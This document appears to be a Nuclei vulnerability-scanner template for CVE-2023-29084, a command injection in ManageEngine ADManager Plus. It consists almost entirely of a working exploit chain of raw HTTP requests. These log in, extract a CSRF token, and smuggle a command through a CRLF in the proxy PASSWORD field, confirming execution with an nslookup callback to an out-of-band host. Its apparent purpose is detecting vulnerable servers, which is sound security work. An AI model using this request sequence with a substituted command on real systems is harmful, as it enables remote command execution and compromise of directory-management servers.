83 lines
2.8 KiB
YAML
83 lines
2.8 KiB
YAML
id: CVE-2023-29084
|
|
|
|
info:
|
|
name: ManageEngine ADManager Plus - Command Injection
|
|
author: rootxharsh,iamnoooob,pdresearch
|
|
severity: high
|
|
description: |
|
|
Zoho ManageEngine ADManager Plus through 7180 allows for authenticated users to exploit command injection via Proxy settings.
|
|
remediation: |
|
|
Apply the latest security patch or update provided by the vendor to fix the command injection vulnerability in ManageEngine ADManager Plus.
|
|
reference:
|
|
- https://hnd3884.github.io/posts/CVE-2023-29084-Command-injection-in-ManageEngine-ADManager-plus/
|
|
- https://community.grafana.com/t/release-notes-v6-3-x/19202
|
|
- http://packetstormsecurity.com/files/172755/ManageEngine-ADManager-Plus-Command-Injection.html
|
|
- https://manageengine.com
|
|
- https://www.manageengine.com/products/ad-manager/admanager-kb/cve-2023-29084.html
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 7.2
|
|
cve-id: CVE-2023-29084
|
|
cwe-id: CWE-77
|
|
epss-score: 0.35624
|
|
epss-percentile: 0.96713
|
|
cpe: cpe:2.3:a:zohocorp:manageengine_admanager_plus:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 3
|
|
vendor: zohocorp
|
|
product: manageengine_admanager_plus
|
|
tags: packetstorm,cve,cve2023,manageengine,admanager,rce,oast,authenticated
|
|
variables:
|
|
cmd: "nslookup.exe {{interactsh-url}} 1.1.1.1"
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /j_security_check HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Origin: {{BaseURL}}
|
|
Referer: {{BaseURL}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
is_admp_pass_encrypted=false&j_username={{username}}&j_password={{password}}&domainName=ADManager+Plus+Authentication&AUTHRULE_NAME=ADAuthenticator
|
|
- |
|
|
GET /home.do HTTP/1.1
|
|
Host: {{Hostname}}
|
|
- |
|
|
POST /api/json/admin/saveServerSettings HTTP/1.1
|
|
Host: {{Hostname}}
|
|
X-Requested-With: XMLHttpRequest
|
|
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
|
Origin: {{BaseURL}}
|
|
Referer: {{BaseURL}}
|
|
|
|
params=[{"tabId":"proxy","ENABLE_PROXY":true,"SERVER_NAME":"1.1.1.1","USER_NAME":"random","PASSWORD":"asd\r\n{{cmd}}","PORT":"80"}]&admpcsrf={{admpcsrf}}
|
|
|
|
cookie-reuse: true
|
|
host-redirects: true
|
|
max-redirects: 2
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- '{"message":"'
|
|
- 'Proxy Settings'
|
|
condition: and
|
|
|
|
- type: word
|
|
part: interactsh_protocol
|
|
words:
|
|
- "dns"
|
|
|
|
extractors:
|
|
- type: kval
|
|
name: admpcsrf
|
|
internal: true
|
|
kval:
|
|
- admpcsrf
|
|
part: header
|
|
|
|
# digest: 4a0a00473045022100dfad9cd6d2df46ab159147221c4d0720d2c8fdfa47d4c9cf703f2fab3a4e27d80220689406698ded770ae206dd88c971f7c74b5ebb13e74feec400d5138776a351ac:922c64590222798bb761d5b6d8e72950
|